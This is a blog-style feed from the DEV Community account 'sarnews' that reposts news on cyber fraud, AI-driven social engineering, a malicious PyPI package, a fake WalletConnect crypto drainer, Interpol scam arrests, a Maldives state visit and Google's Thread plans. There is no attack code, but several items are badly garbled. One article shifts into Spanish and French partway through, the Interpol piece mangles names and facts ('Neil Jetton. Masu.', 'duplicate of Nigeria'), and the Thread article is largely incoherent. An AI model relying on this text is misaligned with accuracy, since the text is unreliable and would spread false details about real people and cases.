DEV Community: sarnews

Bankers’ involvement suspected in 7cr hacking scam | Ahmedabad News - The Times of India

sarnews — Sun, 16 Feb 2025 14:34:01 +0000

Ahmedabad's city crime branch is investigating a significant cyber fraud involving online casinos and e-commerce platforms. They have arrested three main suspectsVijay Vaghela, Nitesh Madta, and Adil Parmarconnected to a Rs 7 crore scam. These individuals hacked websites, manipulated payment systems, and created fake client IDs to alter betting outcomes. The suspects allegedly bribed bank employees for unique transaction reference (UTR) codes to withdraw money from gaming apps. Authorities are also looking into the hacking of a popular gambling app and plan to issue legal notices. The crime branch seized mobile phones and valuables worth Rs 3. 31 lakh and charged the trio under multiple legal acts.

AI-Powered Social Engineering: Ancillary Tools and Techniques

sarnews — Fri, 14 Feb 2025 15:26:41 +0000

Social engineering is rapidly evolving, with generative AI providing cybercriminals new tools for targeting organizations, as highlighted by the FBI's acknowledgment of changing tactics. This article investigates the implications of this acceleration and its impact on IT leaders tasked with safeguarding systems.

Classic social engineering often involves impersonating known individuals through email interactions that exploit urgency or authority to manipulate targets. If leveraging voice communication, attackers may impersonate unfamiliar voices to gain trust. However, these tactics may falter if identity verification is pursued.

With generative AI's emergence, deepfake technology enables adversaries to produce convincing impersonations, blending real recordings to recreate speech and mannerisms. This shift, coupled with an increase in remote interactions, obscures warning signs, as unusual behavior can be dismissed as technical glitches. Furthermore, voice cloning enhances voice phishing (vishing) attacks, prompting experts, like OpenAI, to recommend abandoning voice-based authentication for sensitive access, indicating a significant escalation in social engineering threats.
La comunicación textual se transforma con GenAI, con AI generativa que permite a actores maliciosos operar a un nivel de casi nativo en el idioma, incluso capturando dialectos regionales. Esto amplía las oportunidades para ataques de ingeniería social, donde el idioma ya no es un obstáculo al seleccionar objetivos. Cada persona deja un rastro digital en línea; la información compartida puede ser suficiente para impersonar o comprometer la identidad de alguien. GenAI ahora puede recolectar y organizar datos no estructurados rápidamente, analizando redes sociales y fotos para crear perfiles útiles para ataques. Estos perfiles pueden ser utilizados para extorsión o para robar propiedad intelectual. Con las filtraciones de datos masivos, como la de 3 mil millones de usuarios de Yahoo, se precisa el uso de herramientas GenAI que automaticen la búsqueda y clasificación de información que puede ser empleada con fines maliciosos, facilitando la tarea de los atacantes y manteniendo su anonimato.
L'IA utilise la reconnaissance d'entités nommées pour identifier les auteurs de documents et établir des connexions incriminantes, notamment à travers des transferts d'argent et des discussions confidentielles. Des outils open source comme Recon-ng, configurables pour des tâches comme la collecte d'informations ouvertes (OSINT), coexistent avec des outils non accessibles au public, tels que Red Reaper, une IA d'espionnage capable de passer au crible des milliers d'emails pour détecter des informations sensibles. Avec la montée de la GenAI, les attaquants exploitent Internet comme une base de données, utilisant des informations de départ pour établir des connexions en temps réel. La démocratisation des outils de hacking, souvent automatisés, maquille le paysage, rendant devant la menace beaucoup plus accessible aux cybercriminels. Pour savoir quelles informations compromettantes pourraient exister sur votre organisation, un outil de surveillance des menaces a été développé pour explorer l'internet et identifier les données exploitables avant qu'un attaquant ne les utilise.

Researchers Uncover Python Package Targeting Crypto Wallets with Malicious Code

sarnews — Thu, 31 Oct 2024 13:27:01 +0000

Cybersecurity researchers have discovered a new malicious Python package that masquerades as a cryptocurrency trading tool but harbors functionality designed to steal sensitive data and drain assets from victims' crypto wallets.

The package, named "CryptoAITools," is said to have been distributed via both Python Package Index (PyPI) and bogus GitHub repositories. It was downloaded over 1,300 times before being taken down from PyPI.

"The malware activated automatically upon installation, targeting both Windows and macOS operating systems," Checkmarx said in a new report shared with The Hacker News. "A deceptive graphical user interface (GUI) was used to distract vic4ms while the malware performed its malicious ac4vi4es in the background."

The package is designed to unleash its malicious behavior immediately after installation through code injected into its "init.py" file that first determines if the target system is Windows or macOS in order to execute the appropriate version of the malware.

Present within the code is a helper functionality that's responsible for downloading and executing additional payloads, thereby kicking-off a multi-stage infection process.

Specifically, the payloads are downloaded from a fake website ("coinsw[.]app") that advertises a cryptocurrency trading bot service, but is in fact an attempt to give the domain a veneer of legitimacy should a developer decide to navigate to it directly on a web browser.

This approach not only helps the threat actor evade detection, but also allows them to expand the malware's capabilities at will by simply modifying the payloads hosted on the legitimate-looking website.

A notable aspect of the infection process is the incorporation of a GUI component that serves to distract the victims by means of a fake setup process while the malware is covertly harvesting sensitive data from the systems.

The CryptoAITools malware conducts an extensive data theft operation, targeting a wide range of sensitive information on the infected system," Checkmarx said. "The primary goal is to gather any data that could aid the attacker in stealing cryptocurrency assets."

This includes data from cryptocurrency wallets (Bitcoin, Ethereum, Exodus, Atomic, Electrum, etc.), saved passwords, cookies, browsing history, cryptocurrency extensions, SSH keys, files stored in Downloads, Documents, Desktop directories that reference cryptocurrencies, passwords, and financial information, and Telegram.

On Apple macOS machines, the stealer also takes the step of collecting data from Apple Notes and Stickies apps. The gathered information is ultimately uploaded to the gofile[.]io file transfer service, after which the local copy is deleted.

Checkmarx said it also discovered the threat actor distributing the same stealer malware through a GitHub repository named Meme Token Hunter Bot that claims to be "an AI-powered trading bot that lists all meme tokens on the Solana network and performs real-time trades once they are deemed safe."

This indicates that the campaign is also targeting cryptocurrency users who opt to clone and run the code directly from GitHub. The repository, which is still active as of writing, has been forked once and starred 10 times.

Also managed by the operators is a Telegram channel that promotes the aforementioned GitHub repository, as well as offers monthly subscriptions and technical support.

"This multi-platform approach allows the attacker to cast a wide net, potentially reaching victims who might be cautious about one platform but trust another," Checkmarx said.

"The CryptoAITools malware campaign has severe consequences for victims and the broader cryptocurrency community. Users who starred or forked the malicious 'Meme-Token-Hunter-Bot' repository are potential victims, significantly expanding the attack's reach."

Maldivian president Mohamed Muizzu to visit India from October 6-10

sarnews — Fri, 04 Oct 2024 13:45:58 +0000

This will be Muizzu’s first bilateral visit to India, though he came to New Delhi in June to attend Modi’s swearing-in ceremony.
Maldivian President Mohamed Muizzu will visit India from October 6-10 to hold talks with Prime Minister Narendra Modi, with the external affairs ministry saying on Friday the trip is expected to give momentum to bilateral cooperation and ties.

The trip has been given the status of a state visit, signalling New Delhi’s intention to reset bilateral ties after an acrimonious period in the relationship, people familiar with the matter said on condition of anonymity. This will be Muizzu’s first bilateral visit to India, though he came to New Delhi in June to attend Modi’s swearing-in ceremony along with leaders of six other regional countries.

Get Unlimited access to Hindustan Times E-paper and Archives at 1199/- per year

Muizzu, who became president in November 2023 on the back of an ‘India Out’ campaign, took steps to reduce the Maldives’ dependence on India and demanded the removal of some 85 Indian military personnel deployed in the Indian Ocean archipelago to operate three aircraft. These measures took bilateral ties to a fresh low at the end of last year.

However, there have been signs of a thaw in the relationship in recent months. Maldivian foreign minister Moosa Zameer visited India in May and this was followed by a trip to Maldives by external affairs minister S Jaishankar in August. In September, New Delhi helped Male avoid the risk of defaulting on Islamic bond payments by extending its subscription to government treasury bills worth $50 million for another year.

“The visit of President Muizzu to India after the recent visit of the external affairs minister to Maldives is testimony to the importance that India attaches to its relations with the Maldives and is expected to lend further momentum to cooperation and robust people-to-people ties between the two countries,” external affairs ministry spokesperson Randhir Jaiswal told a media briefing.

Jaiswal described the Maldives as India’s “key maritime neighbour” in the Indian Ocean and said it holds a special place in the SAGAR (Security and Growth for All in the Region) vision and India’s ‘Neighbourhood First’ policy.

A statement from Muizzu’s office in Male said his discussions in India will “focus on strengthening bilateral cooperation and further enhancing the longstanding relationship between the two nations”. Muizzu is committed to “enhancing bilateral ties with nations that play a crucial role in the development and growth of the Maldives, ensuring a dynamic and proactive foreign policy for the nation”, the statement said.

Besides holding talks with Modi on bilateral, regional and international issues, Muizzu will meet President Droupadi Murmu. He will travel to Mumbai and Bengaluru to attend business events. Muizzu will also interact with a sizeable Maldivian diaspora in Bengaluru.

Muizzu, known for his pro-China leanings, too has dialled down the rhetoric against India in recent weeks. While visiting the US to attend the United Nations General Assembly last month, he said during an interaction at Princeton University that the Maldives only had a problem with the presence of foreign military personnel on its soil and wasn’t against any country.

“We have never been against any one country at any point. It’s not ‘India Out’. The Maldives faced a serious problem with foreign military presence on its soil,” he said. “The people of the Maldives do not want a single foreign soldier in the country.”

Muizzu said he had taken action against ministers for making remarks on social media that were perceived as insulting to Modi. “No one should say such a thing. I took action against it. I will not accept insulting anyone like that, whether he is a leader or an ordinary person,” he said.

Last month, two junior ministers, who were suspended in January for derogatory comments against Modi, resigned from the government on the same day that Muizzu’s spokesperson announced he would visit India “very soon”.

Interpol arrests eight in major crackdown on phishing and romance scams in West Africa

sarnews — Thu, 03 Oct 2024 12:14:48 +0000

Interpol announced eight arrests in Côte d'Ivoire and Nigeria as part of its fight against phishing and cyber-romance scams.

The effort, called "Operation Contender 2.0," aims to combat cybercrime in West Africa, the agency said. One such threat was a large-scale phishing scam targeting Swiss citizens that resulted in financial losses of over $1.4 million.

Cybersecurity
Cybercriminals posed as customers on small advertising sites and used QR codes to direct their victims to fraudulent sites imitating a legitimate payment platform. As a result, the victim could accidentally enter personal information such as accounting data and card number. The criminal also issued himself as an unknown customer service agent to further deceive them. Swiss authorities reportedly received approximately 260 fraud reports between August 2023 and April 2024 and have launched a joint investigation to trace the origins of the campaign to Côte d'Ivoire.

The main suspect in the attack admitted to participating in the scheme and making illegal financial benefits of over $1.9 million. Five other individuals conducting cybercriminal activities at the same location have also been arrested.

Phishing and Romance Fraud
In a separate case, authorities said it apprehended a suspect and their accomplice in Nigeria on April 27, 2024, in connection with a romance scam after Finnish authorities alerted the Nigerian Police Force via INTERPOL that a victim was scammed out of a \"substantial amount of money.\"

Such financial grooming crimes entail scammers creating fake online identities on dating apps and social media platforms to develop romantic or close relationships with prospective victims, only to steal money from them. \ "Increasing dependence on technology in every aspect of everyday life, cyber criminals use a certain data flight method and perform fraudulent acts," said Neil Jetton. Masu.

\ "This is a recent successful cooperation under the sponsorship of competitors 2.0, indicating the importance of translating criminals into justice in pursuit of international cooperation in the battle with cyber crimes. "

Cyber security
The U.S. Department of Justice (DOJ) says that the 45 -year -old duplicate of Nigeria and the United Kingdom Yoco Collaboration John Adegbo has been sentenced to seven years in the role of a multi -million dollar sector. BEC BEC). Adegbo "conspired with others to participate in several BEC cyber schemes that resulted in the University of North Carolina receiving more than $1.9 million and attempted to steal more than $3 million from victim organizations in Texas, including local governments, construction companies, and the University of Houston," the U.S. Department of Justice said in a statement. This also follows Meta's announcement that it is partnering with a UK bank to combat fraud on its platform through an information-sharing partnership program called the Fraud Intelligence Reciprocal Exchange (FIRE).

Google continues to weave Thread into smart homes

sarnews — Mon, 30 Sep 2024 09:40:48 +0000

Ryan Daws is an editor -editor of TechForge Media, who has more than 10 years of experience to develop a compelling story and complicate the subjects. His articles and interviews with industry leaders are recognized by an organization like Onalytica as an important influencer. Under his leadership, analyst firms such as Forrester have praised publications for their excellence and performance. Contact me at X (@gadget_ry) or Mastodon (@gadgetry@techhub.social).

Google continues to integrate Thread technology into the very fabric of its ecosystem to increase smart home connectivity. Recent publications and revelations indicate that tech giants are betting big on Thread and Matter as the foundation for the future of the connected home.

The latest Pixel 9 series and Google TV Streamer have Thread radios built in, which could act as a central hub for controlling smart devices. But Google's ambitions don't stop there: the sleuths at Android Authority discovered some crucial clues in the recent Google Play Services beta (v24.38) that hint at deeper Thread integration in the future. Strings mentioning “Thread Networks” and “Thread Networks Control Center” have been spotted in the beta code, indicating Google’s intention to turn Play Services into a Thread network management hub.

This latest development aligns with the company’s ongoing efforts to streamline Thread network setup, including a cloud backup feature for Thread credentials and support for the Thread Group’s credential sharing initiative. The complete integration of the thread remains under the lap, but it is clear that Google plays a long game. Observer in the industry predicts changes in progress, and the wire radio will be common in smart house gadgets and mobile devices in the next few years. In the case of a beginner thread, a communication protocol that uses IEEE 802.15.4 radio technology in the 2.4 GHz spectrum. This can be deployed in the world and is used according to the standards of intellectual families. He promises a more zip chattering to the device than the conventional Wi-Fi or Bluetooth, which requires a specially designed device. Matter acts as a universal translator for smart home devices, aiming to break down the barriers between competing ecosystems like Amazon Alexa, Google Home, Apple HomeKit, Samsung SmartThings, etc. The end goal? Whatever the first loyalty, a harmonious intelligent house where the device works well.

It is clear that Google continues to defend these technologies, which represents the future of the basics of an effective and practical intelligent house where threads and problems are more consistent.

Crypto Scam App Disguised as WalletConnect Steals $70K in Five-Month Campaign

sarnews — Mon, 30 Sep 2024 05:35:26 +0000

Cybersecurity researchers have discovered a malicious Android app on the Google Play Store that enabled the threat actors behind it to steal approximately $70,000 in cryptocurrency from victims over a period of nearly five months.

The dodgy app, identified by Check Point, masqueraded as the legitimate WalletConnect open-source protocol to trick unsuspecting users into downloading it.

"Fake reviews and consistent branding helped the app achieve over 10,000 downloads by ranking high in search results," the cybersecurity company said in an analysis, adding it's the first time a cryptocurrency drainer has exclusively targeted mobile device users.

Over 150 users are estimated to have fallen victim to the scam, although it's believed that not all users who downloaded the app were impacted by the cryptocurrency drainer.

The campaign involved distributing a deceptive app that went by several names such as "Mestox Calculator," "WalletConnect - DeFi & NFTs," and "WalletConnect - Airdrop Wallet" (co.median.android.rxqnqb).

While the app is no longer available for download from the official app marketplace, data from SensorTower shows that it was popular in Nigeria, Portugal, and Ukraine, and linked to a developer named UNS LIS.

The developer has also been associated with another Android app called "Uniswap DeFI" (com.lis.uniswapconverter) that remained active on the Play Store for about a month between May and June 2023. It's currently not known if the app had any malicious functionalit

However, both apps can be downloaded from third-party app store sources, once again highlighting the risks posed by downloading APK files from other marketplaces.

Once installed, the fake WallConnect app is designed to redirect users to a bogus website based on their IP address and User-Agent string, and if so, redirect them a second time to another site that mimics Web3Inbox.

Users who don't meet the required criteria, including those who visit the URL from a desktop web browser, are taken to a legitimate website to evade detection, effectively allowing the threat actors to bypass the app review process in the Play Store.

Besides taking steps to prevent analysis and debugging, the core component of the malware is a cryptocurrency drainer known as MS Drainer, which prompts users to connect their wallet and sign several transactions to verify their wallet.

The information entered by the victim in each step is transmitted to a command-and-control server (cakeserver[.]online) that, in turn, sends back a response containing instructions to trigger malicious transactions on the device and transfer the funds to a wallet address belonging to the attackers.

"Similar to the theft of native cryptocurrency, the malicious app first tricks the user into signing a transaction in their wallet," Check Point researchers said.

"Through this transaction, the victim grants permission for the attacker's address 0xf721d710e7C27323CC0AeE847bA01147b0fb8dBF (the 'Address' field in the configuration) to transfer the maximum amount of the specified asset (if allowed by its smart contract)."

In the next step, the tokens from the victim's wallet are transferred to a different wallet (0xfac247a19Cc49dbA87130336d3fd8dc8b6b944e1) controlled by the attackers.

This also means that if the victim does not revoke the permission to withdraw tokens from their wallet, the attackers can keep withdrawing the digital assets as soon as they appear without requiring any further action.

Check Point said it also identified another malicious app exhibiting similar features "Walletconnect | Web3Inbox" (co.median.android.kaebpq) that was previously available on Google Play Store in February 2024. It attracted more than 5,000 downloads.

"This incident highlights the growing sophistication of cybercriminal tactics, particularly in the realm of decentralized finance, where users often rely on third-party tools and protocols to manage their digital assets," the company noted.

"The malicious app did not rely on traditional attack vectors like permissions or keylogging. Instead, it used smart contracts and deep links to silently drain assets once users were tricked into using the app."

Found this article interesting? Follow us on Twitter  and LinkedIn to read more exclusive content we post.
AndroidApp SecuritycryptocurrencycybersecurityDeFiGoogle Play StoreMalwaremobile security